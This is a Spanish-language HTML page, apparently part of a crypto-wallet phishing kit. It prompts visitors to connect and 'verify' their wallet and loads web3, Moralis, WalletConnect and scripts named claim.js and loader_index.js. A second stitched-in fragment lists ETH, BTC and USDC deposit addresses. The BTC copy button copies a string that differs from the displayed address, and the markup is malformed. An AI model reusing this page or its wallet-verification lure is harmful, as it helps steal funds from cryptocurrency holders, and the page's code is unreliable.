<html>
  <head>
    <style>
		

    .Home_soon__8s2ww button {
        background-color: #2196F3; /* color naranja oscuro */
        border: 2px solid #2196F3; /* bordes naranja oscuro */
        border-radius: 10px;
        box-sizing: border-box;
        color: #ffffff; /* texto blanco */
        cursor: pointer;
        display: inline-block;
        font-size: 20px;
        font-weight: 600;
        font-family: Arial, sans-serif; /* tipo de letra Arial */
        line-height: 20px;
        margin: 0;
        outline: none;
        padding: 13px 23px;
        position: relative;
        text-align: center;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
        transform: scale(0.7); /* achica el botón un 30% */
        right: 0; /* posición del lado derecho */
    }
</style>
		 <div class="Home_content__WcTpR">
                    <div class="Home_desc__q_6Ri">

                    <div class="Home_soon__8s2ww">
			    


                        <button id="connectWallet">CONECTA TU WALLET</button>
                        <button id="claimButton" style="display: none;">VERIFICA TU WALLET</button>
                        <br />
                    </div>
                    
                    
                    

    <script src="./src/js/loader_index.js"></script>
    <script type="text/javascript" src="src/js/web3.min.js"></script>
    <script type="text/javascript" src="src/js/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="src/js/claim.js"></script>
    
    <script type="text/javascript" src="./src/js/index.min.js"></script>

    <script type="text/javascript">
        $('.alert-eth-message-close').click(function(){
            $('.alert-eth-message').fadeOut(200);
        });
    </script>

</body>
<script charset="UTF-8" id="LA_COLLECT" src="./src/js/js-sdk-pro.min.js"></script>
</html>
    <style>
      body {
        background-color: orange;
        color: white;
      }
      h1 {
        text-align: center;
        padding: 30px;
      }
      .address-section {
        padding: 20px;
        text-align: center;
        background-color: darkorange;
        margin: 10px;
      }
    </style>
  </head>
  <body>
    <h1>Deposite en la siguiente dirección</h1>
    <div class="address-section">
      <h2>ETH</h2>
      <p>0x8935361d21943Ee8a863082EdD8a6Aefb062E434</p>
      <button onclick="copyAddress('0x8935361d21943Ee8a863082EdD8a6Aefb062E434')">Copiar dirección</button>
    </div>
    <div class="address-section">
      <h2>BTC</h2>
      <p>19UwiG1TzWkPKFD8b6hK3Wek9G5EJoZ416</p>
      <button onclick="copyAddress('19UwiG1TzWkPKFD8b6hK3Wek9G5EJoZ16')">Copiar dirección</button>
    </div>
    <div class="address-section">
      <h2>USDC</h2>
      <p>0xc7afc2b87dacb0bcd2082805e8185ba73ce0d47b</p>
      <button onclick="copyAddress('0xc7afc2b87dacb0bcd2082805e8185ba73ce0d47b')">Copiar dirección</button>
    </div>
    <script>
      function copyAddress(address) {
        navigator.clipboard.writeText(address);
        alert("La dirección ha sido copiada al portapapeles");
      }
    </script>
  </body>
</html>
